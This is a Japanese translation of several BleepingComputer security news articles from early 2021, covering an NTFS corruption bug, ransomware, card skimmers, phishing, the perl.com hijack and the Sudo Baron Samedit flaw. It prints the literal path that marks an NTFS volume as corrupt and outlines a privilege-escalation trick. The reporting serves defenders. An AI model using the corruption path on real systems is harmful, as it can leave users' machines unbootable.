     全てのWindowsユーザが、このバグの引き金を引くために実行する必要のあることは、以下の画像に示したように、特定のパスにアクセスすることである。

    パスにアクセスするとドライブは損壊としてマークされる(画像をクリックすると拡大表示されます)

     一旦、Windowsがこのパスにアクセスしようとすると、"The file of directory is corrupted and unreadable."と宣言される。次に、このドライブは損壊しているので修復の必要があるとしてマークされる。
     Windowsは次に、コンピュータを再起動し損壊を修復するためにchkdskするように促してくる。
     Microsoftは、そのドライブは実際には損壊していない、そして、chkdskはこの問題を修正するだろうと発言していた。残念ながら、我々と他のテストにおいて、chkdskは、この問題を修正することはなく、Windows 10は再起動することを拒否した。

    【訳者より】動画に関しては、こちらのサイト中程にあります

    MicrosoftはNTFS損壊のバグを修正

     このバグが公開されて以来、Microsoftが2月の定例パッチの一部として修正をリリースするのではないかという期待があった。
     この期待が裏切られたので、Mozilla Firefox 85.0.1は、このパスへのアクセスを妨げるためのチェックを追加したし、OSRは、Windows中にこのパスをブロックするための非公式のパッチをリリースした。
     今週のWindows 10 Insider build 21322のリリースで、Microsoftは、このパスへのアクセスを妨げるundocumentedの修正を含めている。
     これで、あなたが、c:\:Si30:$bitmapにアクセスしようとすると、Windows 10は以下に示すように"The directory name is invalid,"を戻してくるので、最早NTFSボリュームを損壊としてマークすることはない。

    NTFS損壊のバグはWindows 10 'Dev'チャンネルでは修正された(画像をクリックすると拡大表示されます)

     残念ながら、この修正はWindows 10 Insider 'Dev'チャンネルにのみ存在しており、Windows 10 21H1 'Beta'プレビュー(この春にリリースされる次の機能アップデート)には存在していない。
     Microsoftが、より早くリリースされるWindowsバージョンにこの修正を引き上げた場合を除き、しばらくの間、このバグで立ち往生することになるだろう。


    大手認証企業Underwriters Laboratoriesが身代金要求型マルウェアによって攻撃された
    BleepingComputer : News>Security(2021/02/21)
     Underwriters Laboratoriesとして知られる UL LLCは、身代金要求型マルウェアの攻撃を受けサーバーが暗号化された。そして、修復期間中システムのシャットダウンが発生していた。
     ULは、米国最大で最古の安全性承認企業であり、14,000人の従業員と40を超える国々に事務所を持っている。
     今までに電気機器(ラップトップ、TVのリモコン、白熱電球、AppleのUSB充電器)の背面に注目したことがあるのなら、そのデバイスに印刷されたULのロゴを即座に認識できたはずである。

    FiosルータのUL証明(画像をクリックすると拡大表示されます)

     企業が新しい製品をリリースする時、その企業は一般的に、全国的に認証される安全性と持続性の基準に基づいてテストされ認証されるためにULに製品を提出する。テストがどのように実施されたのかと、その結果に基づいて、その製品は、多様なUL証明書を受け取る。
     製品の安全性証明書に加えて、ULは、大変人気のある 3DMark, PCMark, VRMarkや、PCとグラフィックス ベンチマーク ユーティリティもまた開発している。

    ULは先週末、身代金要求型マルウェアに攻撃された

     BleepingComputerは、先週末身代金要求型マルウェア攻撃を受け、彼らのデータセンター中のデバイスを暗号化されたことを認識した。
     攻撃のさらなる拡大を防ぐために、この企業はシステムをシャットダウンしたので、従業員の一部は仕事をすることができなくなった。
     ULは、この脅威のアクターに接触しないように、この身代金要求型マルウェア オペレーションに関連する如何なるサイトも訪問しないように従業員に命じた。
     この攻撃に精通している情報筋によると、ULは身代金を支払わずに、バックアップから復元することを決定した。
     デバイスの復元には時間がかかるので、この攻撃は、ULが復元している間myULクライアントポータルをオフラインのままにせしめた。

    myULクライアントポータルの停止メッセージ(画像をクリックすると拡大表示されます)

     BleepingComputerへの声明において、ULは、この攻撃が2月13日に発生したことと、現在攻撃を調査中であることを認めている。

    「ULは、2021年2月13日にシステム上に異常な挙動を検出した。即座にこの状況を解決するための予防策を取った。これには、システムのシャットダウン、大手サイバーセキュリティ企業との協力、所轄官庁への通報が含まれる。我々の当面の優先事項は、顧客への影響を最小限に抑えるために、システムを復元することである。」

     「我々は調査から詳細を認識するまで、影響を受けた可能性のある情報の種類を推測できない。影響を受けたデータが判明次第、適切なアクションを取る。」 - UL LCC

     どの身代金要求型マルウェア オペレーションがこの攻撃を指揮したのか、攻撃者は暗号化されていないファイルを盗んだのか否かは判明していない。
     大部分の企業をターゲットにした身代金要求型マルウェア オペレーションは、二重強請作戦を使用するために暗号化されていないファイルを盗むので、ギャングは、おそらくこの攻撃の間にデータを盗んでいるだろう。


    ハッカーはCSPをバイパスしクレジットカードを盗むためにGoogleのApps Scriptを悪用している
    BleepingComputer : News>Security(2021/02/18)
     攻撃者は、オンラインショッピングをしている間に、eコマースWebサイトの顧客によって提出されたクレジットカード情報を盗むために、GoogleのApps Script商用アプリケーション開発プラットフォームを悪用している。
     彼らは、script.google.comドメインを使用することで、マルウェアスキャンエンジンから彼らの悪意ある行為を上手く隠蔽し、Content Security Policy (CSP、【訳注】コンテンツセキュリティポリシーとは、クロスサイトスクリプティング (XSS) やデータインジェクション攻撃などのような、特定の種類の攻撃を検知し、影響を軽減するために追加できるセキュリティレイヤーのこと(MDN Web Docsより)) をバイパスしている。
     犯罪者は、オンラインストアがGoogleのApps ScriptドメインをTrustとして考えており、オンラインストア サイトのCSP設定(Webアプリでの信頼できないコードの実行をブロックするためのセキュリティ標準)が、Googleの全てのサブドメインをホワイトリストに登録している可能性があるという事実を悪用している。
     クレジットカードスキマーは(Magecartスクリプトやペイメントカードスキマー)は、サイバー犯罪者のグループ(Magecartグループとして知られる)によって挿入されるJavaScriptベースのスクリプトであり、Webスキミング(eスキミングとしても知られている)攻撃の一部としてハッキングされたオンラインストアに挿入される。  一旦配備されると、このスクリプトは攻撃者が支払いとハッキングされているショップの顧客によって提出された個人情報を収穫し、彼らの制御下にあるサーバにそれを収集することを可能にする。

    Google Apps Scriptドメインは、抽出エンドポイントとして使用された

     この新しい支払い情報を盗む戦略は、デジタルスキミングとの戦いに重点的に取り組んでいるセキュリティ企業Sansecによって提供されたEarly Breach Detectionデータを解析している間に、セキュリティ研究者Eric Brandelによって発見された。
     彼が発見した時、悪意のある難読化されたスキマースクリプトは、攻撃者によってユーザが提出した支払い情報を横取りするためのeコマースサイトに挿入されていた。
     セキュリティ侵害されたオンラインショップから盗まれた全ての支払い情報は、base64でエンコードされたJSONデータとしてGoogle Apps Scriptカスタム アプリケーションに送信される(抽出エンドポイントとしてscript[.]google[.]comを使用して)。
     Google Apps Scriptのエンドポイントに到達した後、このデータは攻撃者によって制御されている他のサーバ(イスラエルに本拠を置くanalit[.]tech)に転送される。
     「このマルウェアドメインanalit[.]techは、以前発見されたマルウェアドメインhotjar[.]hostとpixelm[.]techと同日に登録されており、同じネットワー上にもホストされている」と、Sansecは発言している。

    攻撃者のカスタムGoogle Apps Scriptアプリケーションにアクセスした時に表示されたエラー(画像をクリックすると拡大表示されます)

     これは、このGoogleサービスが悪用された初回ではない。過去にFIN7サイバー犯罪者グループによって、 マルウェアのコマンドアンドコントロールサーバ用にGoogle SheetsとGoogle Formsサービスとが一緒に使用されている。
     2015年の半ば以降、FIN7 (別名Carbanak あるいは Cobalt) は、Carbanakバックドアを使用して銀行とEUと米国企業のPoint of Sale(【訳注】 店舗販売時点情報管理)端末をターゲットにした。
     「この新しい脅威は、信頼できないドメインとの通信からWebストアを単に保護するだけでは不十分であることを示している」と、「eコマースのマネージャは、そもそも攻撃者が認証されていないコードを挿入できないことを保証する必要がある。サーバーサイドマルウェアと脆弱性をモニタリングすることは、あらゆる現代のセキュリティポリシーで必須のものである」と、Sensecは付け加えている。

    Google Analyticsもまた、クレジットカードを盗むために悪用されていた

     他のGoogleサービスもまた、Magecart攻撃に悪用されていた。Google Analyticsプラットフォームも攻撃者によって使用され、数十ダースのオンラインストアから支払い情報が盗まれていた。
     これらの攻撃を更に悪化させているのは、Google Analytics APIを悪用することによって、Webストアが、訪問者を追跡するために、CSP設定でGoogleのWeb Analyticsサービスがホワイトリストに登録されていることを確認し、脅威のアクターがCSPを回避する可能性があることである。
     当時、SansecとPerimeterXが発見したように、インジェクションベースの攻撃をブロックする代わりに、Google Analyticsスクリプトを許可することは、攻撃者がそれらを活用しデータを盗み抽出することを可能にした。
     これは、盗んだデータをエンコードし、暗号化された形式で攻撃者のGoogle Analyticsダッシュボードに、それを送信するように特別に設計されたWebスキマースクリプトを使用して実行される。
     BuiltWithによって提供された統計に基づくと、現在2800万を超えるサイトがGoogleのGA(Google Analyticsの略) Web Analyticsサービスを使用している。PerimeterXの統計によると、2020年3月にHTTPArchiveスキャンを介して到達可能な17,000のWebサイトが、google-analytics.comドメインをホワイトリストに登録している。
     「一般的に、デジタルスキマー(別名Magecart)は、タックス・ヘイブンにある危険なサーバーで実行され、その場所は、極悪な意図を顕にしている」と、当時Sansecは説明していた。
     「しかし、スキミングキャンペーンが全体的に信頼されているGoogleサーバで実行されると、殆どのセキュリティシステムは『不審なドメイン』('suspicious')とするフラグをたてることはない。より重要なのは、サイトの管理者がGoogleを信頼すると、Content-Security-Policy (CSP) のような人気のある対抗策が機能しなくなることにある」
     「CSPは信頼できないコードの実行を制限するために発明された。しかし、殆ど全ての人がGoogleを信頼しているので、このモデルは欠陥がある」と、SansecのCEOで設立者であるWillem de GrootはBleepingComputerに話した。


    Microsoft、Windows 10のWiFiクラッシュを修正する緊急の定例外アップデートをリリース
    BleepingComputer : News>Security(2021/02/11)
     Microsoftは、WPA3 WiFiネットワークに接続する時、Windows 10がクラッシュを発生するバグに関する緊急の定例外アップデート(KB5001028)をリリースした。
     MicrosoftのWindows Message Centerに投稿された新しいサポートによると、このバグは、最近のWindows 10 1909累積アップデート(特に、2021年01月21日にリリースされたKB4598298と、先週の火曜日(2021年02月09日)にリリースされたKB4601315)で導入された。
     このバグは、WPA3 WiFiネットワークに接続しようとした時に、デバイスにBlue Screen of Death (BSOD、死のブルースクリーン)を発生させる。WPA3は、現時点で強力なセキュリティを持っているので推奨されているワイアレス暗号化プロトコルである。
     Microsoftが本日公開したことによると、「あなたが、Wi-Fi Protected Access 3 (WPA3)に接続しようとした時、ブルースクリーンと共にnwifi.sysに0x7Eストップ エラーを受け取っている場合がある」と、「切断したり、スリープやハイバーネーションから復帰しWiFiネットワークに再接続しようとした時この問題に遭遇するだろう。殆どのWiFiネットワークは現在WPA2を使用している、そして、WPA2はこの問題の影響を受けないことに注意しなさい」とある。
     定例外アップデートに加えて、Microsoftは、以下の軽減するためのステップも提供している。これは特定のユーザにとっては望ましいものではない可能性がある。
      ・ デバイスをWindows 10, version 2004または、Windows 10, version 20H2にアップデートする
      ・ WPA2を使用してWiFiに接続する。これを実行するには、アクセスポイントとルータ設定を再設定する必要があるかもしれない
      ・ 有線イーサネット接続を使用して接続する
     定例外アップデートKB5001028は現在、Windows Update, WSUS, Microsoft Updateカタログを介して利用可能になっている。


    ダークサイドに結びついているAndroidアプリケーションは数百万ユーザに対してマルウェアアップデートを送信していた
    BleepingComputer : News>Security(2021/02/08)
     Googleは、Play Storeから1000万を超えてインストールされている人気あるAndroid barcode scanner(バーコードスキャナ)を削除した。これに先立って、研究者は、2020年12月のアップデートで悪意あるものに変換されたことを発見していた。
     数年間の休眠の後、LAVABIRD LTDによって開発され以前は正当なものであったBarcode Scannerアプリケーションは、セルフアップデートされ、現在セキュリティベンダによってトロイの木馬とタグ付けされている悪意あるコードを使用してユーザのデバイスを乗っ取っている。
     数百万のユーザによって経験された悪意ある挙動は、ユーザと何ら対話することなくDefaultブラウザを起動したり、他の潜在的に悪意のあるAndroidアプリケーションを宣伝する広告を表示したりすることが含まれている。
     「所有者の多くは、長期間彼らのモバイルデバイスにこのアプリケーションをインストールしていた(あるユーザは数年間インストールしていた)」と、「前触れもなく、12月のアップデートの後、Barcode Scannerは、無害なスキャナから完全に悪意ある物に変わった」と、Malwarebytesのマルウェア研究者Nathan Collierは発言している。

    (画像をクリックすると拡大表示されます)

     これは、悪意あるコードがAndroidアプリケーション中で発見された初めてのことではないが、このような事案は通常、収益を上げるために広告を表示するフリーのアプリケーションによって使用されるサードパーティのソフトウェア開発キット(SDK)の使用に関係している。
     しかし、今回の場合、難読化と署名された悪意あるコードはアプリケーションに同梱され、1000万ユーザを超えるデバイスに一挙にインストールされている。
     「これが同じアプリケーションの開発者からのものであるか否かを検証すると、以前のクリーンなバージョンと同じデジタル証明書でサインされていることが確認された」、更に、「Android/Trojan.HiddenAds.AdQRを検出したので、その悪意の目的のために、我々はアドウェアのオリジナルの検出カテゴリを越えてトロイの木馬に直接ジャンプした」と、Collierは追加している。  Googleは、12月のMalwarebytesの発表を受け取った後、Play StoreからLAVABIRDのBarcode Scannerアプリケーションを削除した。
     それであるにも拘わらず、依然として影響を受けたまま、知らないうちにユーザベースに不要な広告を表示されている数百万のデバイスが存在している可能性がある。
     LAVABIRDのスポークスマンは、BleepingComputerは本日早朝コメントを求めて接触したが即座の回答は得られていない。


    新しいフィッシング攻撃は悪意あるURLを非表示にするためにモールスコードを使用している
    BleepingComputer : News>Security(2021/02/07)
     新しいターゲット フィッシングキャンペーンは、eMail添付ファイル中の悪意あるURLを非表示にするために、新奇な難読化テクニックであるモールスコードを使用している。
     Samuel MorseとAlfred Vailは、電信でメッセージを送信する方法としてモールスコードを発明した。モールスコードを使用すると、各文字と数字は、一連のドット(短点)とダッシュ(長点)で暗号化される。
     先週始め、脅威のアクターは、モールスコードを悪用し、電子メールセキュリティとメールフィルタをバイパスするために、フィッシング フォーム中の悪意あるURLを非表示にすることを始めた。
     BleepingComputerは、過去のフィッシング攻撃中に、この新奇な難読化テクニックであるモールスコードへの参照を見つけることができなかった。

    新奇なモールスコード フィッシング攻撃

     Redditの投稿でこの攻撃を最初に認識した後、BleepingComputerは、2021年02月02日以降VirusTotalにアップロードされたこのターゲット攻撃に関する多くのサンブルを発見することができた。
     このフィッシング攻撃は、'Revenue_payment_invoice February_Wednesday 02/03/2021'のような件名で企業の請求書を装うeMailで開始される。

    フィッシング メール(画像をクリックすると拡大表示されます)

     このeMailは、企業のExcel請求書であるかのように名付けられたHTML添付ファイルを含んでいる。これらの添付ファイルは、'[company_name]_invoice_[number]._xlsx.hTML'の形式で名付けられている。
     例えば、BleepingComputerが騙られている場合であれば、添付ファイルは、'bleepingcomputer_invoice_1308._xlsx.hTML'と名付けられるだろう。
     この添付ファイルをテキストエディタで表示すると、このメールには文字と数字をモールスコードにマップするJavaScriptを含んでいることが分かる。例えば、以下に示すように、文字'a'は'.-'にマップされ、文字'b'は'-...'にマップされる。

    HTMLフィッシング添付ファイルのソースコード(画像をクリックすると拡大表示されます)

     このスクリプトは次に、モールスコード文字列を16進数文字列に復号するためにdecodeMorse()関数をコールする。この16進数文字列は更にHTMLページに挿入されるJavaScriptタグに復号される。

    復号されたJavaScriptタグ(画像をクリックすると拡大表示されます)

     HTML添付ファイルとこの挿入されるスクリプトの組み合わせは、インチキのExcelスプレッドシートを表示し、サインインがタイムアウトしたと主張してパスワードの再入力を促すために必要な様々なリソースを含んでいる。

    フィッシング ログインフォームを表示するHTML添付ファイル(画像をクリックすると拡大表示されます)

     ユーザがパスワードを入力すると、このフォームは攻撃者がログイン認証を収集しているリモートサイトに、このパスワードを送信する。
     このキャンペーンは大変標的型である。脅威のアクターは説得力を高めるためにlogo.clearbit.com(【訳注】簡単にプロジェクトに企業のロゴを埋め込むことができるツール(Clearbitより))サービスを使用して、騙られている企業のロゴを挿入している。企業のロゴを使用できない場合は、上の画像に示したように一般的なOffice365のロゴを使用している。
     BleepingComputerは、このフィッシング攻撃のターゲットにされた11の企業(SGS, Dimensional, Metrohm, SBI (Mauritius) Ltd, NUOVO IMAIE, Bridgestone, Cargeas, ODDO BHF Asset Management, Dea Capital, Equinti, Capital Four)を確認した。
     メールゲートウェイが悪意あるeMailをより良く検出するようになっているので、フィッシング詐欺は、日々より複雑化してきている。
     これに起因して、全ての人々は、いかなる情報も送信する前にURLと添付ファイルの名前に細心の注意を払う必要がある。何か疑わしいのであれば、受信者は更に調査するためにネットワーク管理者にコンタクトする必要がある。
     今回のフィッシングeMailは、添付ファイルに二重拡張子(xlxsとHTML)を使用しているので、Windowsファイル拡張子が有効になっていることの確認は、疑わしい添付ファイルを見つけやすくするので重要なことである。


    Fonix身代金要求型マルウェアがオペレーションを終了。マスター復号キーをリリース(概要)
    BleepingComputer : News>Security(2021/01/29)
     Fonix身代金要求型マルウェアのギャングが、本日の午後(米国時間)オペレーションの終了をTwitter上で表明した。但し、メンバーの一部にオペレーションの終了に反対した者がいたことも明らかにしている。
     別のTweetで、'Fonix_decrypter.rar'と名付けられたRARアーカイブへのリンクが共有されている。このアーカイブは復号ツールとマスター秘密復号鍵の両方を含んでいる。
     今夜リリースされた復号ツールは、犠牲者の幾つかのファイルを無料で復号してみせるためのツールであり、犠牲者がコンピューター全体を復号することはできない。
     マスターキーの方は、Fonix身代金要求型マルウェアの一部のバージョンでだけ動作する。
     Emsisoftの復号プログラムは、.Fonix, .FONIX, .repter, .XINOF拡張子を含む全てのバージョンを復号する。
     現在、暗号化トラフィック分析(ETA)がなされていない。あなたが犠牲者であれば、解決策はもう直リリースされるだろう。


    Windowsインストーラの0-Dayの脆弱性にフリーのマイクロパッチがリリースされた
    BleepingComputer : News>Security(2021/01/29)
     Windowsインストーラ コンポーネント中の脆弱性は、Microsoftが数回修正を企てたものの役に立たなかったが、本日、セキュリティ侵害されたシステム上で最高の特権を取得するオプションをハッカーに取得させないようにするマイクロパッチを受け取った。
     この問題はWindows 7から10に影響する。この問題を解決しようとするMicrosoftの最も最近の努力は10月だった。2020年12月下旬に、概念の実証(PoC)エクスプロイト コードを備えたバイパスが登場した。

    パッチ、バイパス、繰り返し

     MSIパッケージのインストール中、Windowsインストーラは、その過程で上手く行かなかった場合、あらゆる変更を元に戻すために‘msiexec.exe’を介してロールバックスクリプトを作成する。
     ローカル特権のハッカーは、ロールバックスクリプトを彼らのペイロードに差し向けるようにレジストリ値を変更したものに置き換えることができたなら、SYSTEMパーミッションで実行可能ファイルを稼働することができる。
     この脆弱性は、Microsoftの探査網に現れ、2019年4月(CVE-2019-0841)に修正がなされた。脆弱性研究者Sandbox Escaperは、5月末にバイパスできることを発見し、技術的詳細の一部を公開した。
     このストーリは4回も繰り返された(CVE-2019-1415, CVE-2020-1302, CVE-2020-0814, CVE-2020-16902)。そして、依然としてWindowsインストーラは、セキュリティ侵害されたマシンで最高のパーミッションを取得できる特権の昇格のための攻撃が可能である。
     最新のバイパスは、セキュリティ研究者Abdelhamid Naceriによって、複数のセキュリティソフトに影響を与える脆弱性と共に彼のブログで公開された。

    一時的な修正が利用可能に

     Mitja Kolsek(ACROS SecurityのCEで、マイクロパッチサービス0patchの共同設立者)は、Naceri’s PoCがこの脆弱性に関してどのような作業をしたのか説明している。

    「この概念の実証は、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Fax\ImagePath を c:\Windows\temp\asmae.exe に値を変更したロールバックスクリプトを使用している。このサービスが起動すると、攻撃者のasmae.exeを使用したFax Service(【訳注】 Outlook、Word、Excel、PowerPoint のファイルをインターネットFAXとして送信できるMicrosoft Officeの機能(Microsoftサポートより))という結果になる。このサービスは、あらゆるユーザが、それを起動することを可能にするために使用される。そして、これはローカルシステムで実行される」- Mitja Kolsek

    Microsoftの永続的なパッチが出現するまで、この一時的な修正が、0Patchプラットフォームから利用可能である。この一時的な修正は、システム再起動を伴わない単一命令の修正である。  このビデオ(リンク)は、ローカルの非管理者ユーザによるFaxService実行ファイルに差し向け、攻撃者のコードを実行するレジストリ値の改竄を、このマイクロパッチが妨げていることを示している。
     0Patchからのフリーで一時的な修正は、以下のシステムで動作する。
      ・ Windows 10 v20H2, 32/64bit, updated with January 2021 updates
      ・ Windows 10 v2004, 32/64bit, updated with January 2021 updates
      ・ Windows 10 v1909, 32/64bit, updated with January 2021 updates
      ・ Windows 7, 32/64bit, with ESU, updated with January 2021 updates
      ・ Windows 7, 32/64bit, without ESU, updated with January 2020 updates


    Perlドメインが盗まれ、現在マルウェアに結び付けられたIPアドレスが使用されている
    BleepingComputer : News>Security(2021/01/29)
     ドメイン名Perl.comが今週盗まれ、現在マルウェアキャンペーンに関連付けられたIPアドレスに振り向けられれている
     Perl.comは、Perl Foundationによって所有されているサイトであり、1997年以来、Perlプログラミング言語に関するニュースと記事を投稿するために使用されてきた。
     1月27日、Perl NOC(the perl.org infrastructure weblog!)サイトに、perl.comドメインがハイジャックされ、現在ユーザは別のIPアドレスに振り向けられていると投稿された。
     「perl.comドメインは、今朝ハイジャックされ、現在ユーザは構築中のサイトに振り向けられている。修復に向けて作業中」と、Perl.orgはポストしている。
     本来のperl.comサイトのIPアドレスは、151.101.2.132であったが、ハイジャックされて以来、現在Google Cloud IPアドレス 35.186.238[.]101 にホストされている。
     サイトを訪問した時、ユーザはブランク ページで迎えられる。このページのHTMLは、このドメインがレジストラkey-systems(.)netに登録されている場合でさえ、GoDaddy(【訳注】 米国 スコッツデールに本社を置くドメイン レジストラ・レンタルサーバ サービス(Wikipediaより))パークドメイン(【訳注】 機能していないサイトを指し示すドメイン。多くの場合、訪問者にドメインが構築中であるか、広告でいっぱいのページであることを知らせるページが表示される(EsDifferent.comより))スクリプトを含んでいる。
     Perl言語の開発者brian d foyは、ドメインが修復されるまで、このサイトにアクセスしたいユーザのために、彼らが一時的にperl.comをhttp://perldotcom.perl.orgにセットアップしていたとTweetしている。
     ハイジャックされたドメインが修復されるまで、Perl Foundationは、CPAN(【訳注】 Perlのライブラリ・モジュールやその他のPerlで書かれたソフトウェアを集めた巨大なアーカイブ(Wikipediaより))ミラーとして、以下のコマンドを使用して、それをアップデートするためにperl.comを使用ないようにユーザに、要請している。

    # perl -MCPAN -eshell
    cpan shell -- CPAN exploration and modules installation (v2.20)
    Enter 'h' for help.

    cpan[1]> o conf urllist http://www.cpan.org/
    Please use 'o conf commit' to make the config permanent!
    cpan[2]> o conf commit
    commit: wrote '/root/.cpan/CPAN/MyConfig.pm'

     現時点で、ドメインが盗まれた方法は未知である。BleepingComputerは、Perl Foundationにこの件に関する質問状を送付したが、回答は受け取っていない。

    マルウェアに結び付けられた新しいperl.comのIP

     perl.comが現在ホストしているIPアドレスは、古いマルウェアキャンペーンとより新しいマルウェアキャンペーンとで使用されてきた長い歴史を持っている。
     2019年、IPアドレス 35.186.238[.]101 は、現在は消滅しているLocky身代金要求型マルウェアの実行ファイル(VirusTotal)を配布するためのドメインに結び付けられていた。
     より最近では、ad clickerのように見えるマルウェア(VirusTotal)が、コマンドアンドコントロールサーバとして以下のドメインを使用していた。

    www.supernetforme[.]com
    www.superwebbysearch[.]com

     これらのドメイン名は共に、以下に示すように、35.186.238[.]101 に解決される。

    35.186.238[.]101をホストしているコマンドアンドコントロールサーバ(画像をクリックすると拡大表示されます)

     マルウェアが、これらのドメインでURLに接続しようとすると、現在perl.comを訪問するために使用されているものと同じパーク ドメイン スクリプトを受け取るだろう。
     これらHTMLレスポンスは、C2(コマンドアンドコントロールサーバ)の指示ではなく、このIPアドレスが、異なる脅威のアクターの制御下にあることを示している可能性がある。
     現在に関しては、このドメインをPerl Foundationが取り戻すまで、perl.comを訪問しないよう強くアドバイスする。攻撃者は、このドメインを多くの悪意ある目的のためのサイトに簡単に切り替えることができるのだから。


    新しいLinuxのSUDOフローは、ローカルユーザがルート権限を取得することを可能にしていた
    BleepingComputer : News>Security(2021/01/26)
     既に修正されているSudoの脆弱性は、全てのローカルユーザが認証を要求されることなく、Unix-likeなオペレーティングシステムでルート権限を取得することを可能にしていた。
     Sudoは、sudoersファイルにリストされた通常ユーザに対して限定的にルート権限を提供してシステム管理者にするUnixプログラムである。
     これは、このプログラムがローカルユーザに対してシステム全体のセキュリティを改竄することなく作業を実行するために必要なパーミッションだけを付与するとする最小権限の原則(Principle of Least Privilege)で動作する。
     Unix-likeなOS上でコマンドを実行すると、非特権ユーザが、パーミッションを持っているか、ルートユーザパスワードを知っている場合には、sudo(superuser do)コマンドを使用してルートとしてコマンドを実行することができる。ルートはシステムのスーパーユーザであり、特別なシステム管理アカウントである。
    Sudoはまた、sudoers設定ファイルに特別な命令を含ませることによって、通常ユーザが他のユーザとしてコマンドを実行できるように設定することができる。

    ローカルユーザ用のルート特権

     CVE-2021-3156(別名、Baron Samedit) として追跡されるSudoの特権昇格の脆弱性は、Qualysのセキュリティ研究者によって発見された。彼らは、1月13日に明らかにし、パッチが利用可能になったことを確認した後に、彼らの調査結果を公開した。
     Qualysの研究者によると、この問題は、攻撃者がこのフローを成功裏に攻撃するためにユーザのパスワードを知る必要はないので、任意のローカルユーザ(通常ユーザ、システムユーザ、sudoersファイルにリストされているか否かに関わらず)によって悪用できるヒープベースのバッファオーバーフローである。
     任意のローカルユーザにルート特権の取得を可能にするこのバッファオーバーフローは、引数中のバックスラッシュを不正にエスケープされない形に戻したSudoによってトリガーされる。
     「通常、Sudoはシェル(sudo -s もしくは sudo -i)を介してコマンドを実行している時、特別な文字をエスケープする」と、1.9.5p2チェンジログにある。
     「しかしながら、Sudoは、-s もしくは -iフラグ付きでsudoeditを実行することも可能である。この場合に、実際にはエスケープが実行されないので、バッファオーバーフローが可能になる。」
     Qualysは、潜在的な攻撃者によって、この脆弱性が成功裏に悪用される方法を示すために、三つのCVE-2021-3156に対するエクスプロイトを作成した。
     これらのエクスプロイトを使用することで、この研究者は複数のLinuxディストリビューションで完全なルート権限を取得することができた。この中には、Debian 10 (Sudo 1.8.27), Ubuntu 20.04 (Sudo 1.8.31), Fedora 33 (Sudo 1.9.2)が含まれる。
     Qualysによると、Sudoをサポートする他のオペレーティングシステムとディストリビューションも、おそらくCVE-2021-3156に対するエクスプロイトを使用して脆弱性攻撃することが可能である。
     CVE-2021-3156を脆弱性攻撃する方法の技術的な詳細は、火曜日に公開されたQualysのCVE-2021-3156セキュリティ アドバイザリを参照されたい。
     緊急のCVE-2021-3156を脆弱性攻撃する方法のデモンストレーション ビデオは、こちらのリンク参照。

    Baron Sameditフローは公開される前に修正された

     この脆弱性は、9年前(2011年7月)にSudoプログラムに導入された(付託8255ed69)、そして、1.9.0から1.9.5p1までの全ての安定版と1.8.2から1.8.31p2までの全てのレガシーバージョン(【訳注】 ベンダーのサポートが終了したバージョン(Wikipediaより))の設定に影響を与える。
     Sudo貢献者は、先程この脆弱性を修正したバージョンsudo 1.9.5p2をリリースした。同時にQualysは、彼らの調査結果を公開した。
     あなたのシステムに脆弱性が存在するか否かをテストするには、非ルートユーザとしてログインし、"sudoedit -s /"コマンドを実行する。脆弱性のあるシステムは、"sudoedit:"で始まるエラーを投げてくる。また、パッチされているシステムは、"usage:"で始まるエラーを表示する。
     ユーザにルート権限を渡すためにSudoを使用しているシステム管理者は、即座にSudo 1.9.5p2もしくは、それ以降のバージョンにアップグレードしなさい。
     2019年、別のSudo脆弱性(CVE-2019-14287として追跡された)は、非特権ユーザにルートとしてコマンドを実行することを可能にしていた。
     幸いなことに、このフローは非標準設定でのみ脆弱性攻撃される。このことは脆弱性のあるSudoを稼働している殆どのシステムでは影響を受けないことを意味している。


    Windows 10のNTFS破損のバグに非公式の一時的な修正がリリースされた
    BleepingComputer : News>Security(2021/01/25)
     開発者は、特別に細工されたファイルを単に閲覧するだけでNTFSボリュームを破損に導くWindowsのバグに関する非公式の修正をリリースした。
     今月始め、BleepingComputerは、Windows 10のバグがセキュリティ研究者Jonas Lykkegaardによって発見されたことをレポートした。このバグは、特権のないユーザーがNTFSボリュームを破損としてマークすることを可能にするものである。
     このボリュームが破損としてマークされると、Windowsは、そのドライブが損壊しているのでコンピュータを再起動してchkdskを実行し、この破損を修正するように促すエラーを表示する。
     殆どの人々に関しては、Windowsがchkdskを実行するとオペレーティングシステムは直ぐに通常通りにブートするだろう。残念ながら、BleepingComputerのテストでは、chkdskを実行した後でさえ、オペレーティングシステムは適切に動作しなかった。

    BleepingComputerが後に学んだことだが、このバグはまたWindows XPを含むWindowsの過去のバージョンにも影響を与える。

    サードパーティーがNTFSバグの修正をリリースした

     Windows内部に特化したソフトウェア開発企業OSRは、Microsofstからの公式の修正を待っている間に、このNTFSバグが悪用されることを妨げるために、オープンソース フィルタードライバをリリースした。
     'i30Flt'と呼ばれるこのフィルタードライバは、“:$i30:"で始まるストリームへのアクセスを監視する。検出された場合には、このバグの引き金を引かれる前に、それらをブロックする。
     「OSRDrivers/i30Flt: これは“:$i30:"で始まるストリームへの如何なるアクセスもブロックする単なるフィルターである。これは、特定のWindows10のバージョンでトリガーされる偽の破損警告を停止する(github.com)」と、OSRはこのバグに関するブログへの投稿で述べている。
     BleepingComputer同様に、OSRはこのバグをひねくり回していた時に、chkdskを実行した後にも最早ブートしなくなったシステムに遭遇した。

    「また、OSRには、このバグをひねくり回している間に2回chkdskを行ってもブートしないシステムがある。酷い警告と破損したシステムの間で、我々は本物の修正がリリースされるまで緩和策を取ることは有益であると考えた。」- OSR

     このドライバをインストールするには、このプロジェクトのGitHubページから、このドライバをダウンロードし、管理者特権でコマンドプロンプトを起動する。次に、このファイルを解凍したフォルダに移動する。
     このファイルの存在するフォルダに入ったら、このドライバをインストールするために以下のコマンドを実行する。

    RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 .\i30flt.inf
    wevtutil im i30flt.man
    fltmc load i30flt

     ドライバをインストールした後に、Windowsを再起動する必要はない。
     OSRのドライバがインストールされ、"$i30:"を含むパスへアクセスしようとする行為が検出されると、この企てはブロックされ、以下に示すイベントログが生成される。

    このフィルタードライバによって作成されたイベント(画像をクリックすると拡大表示されます)

     Microsoftがこのバグを修正する用意があるとBleepingComputerに告げてきているので、パッチされたなら以下のコマンドを使用して、このフィルタドライバーを削除しなさい。

    RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultUninstall 132 .\i30flt.inf

     以下に示したように、このバグが修正される前に、このドライバをアンインストールすると、このバグは直ちにドライバを破損としてマークするために使用される。

    このフィルタードライバをアンインストールすると(画像をクリックすると拡大表示されます)

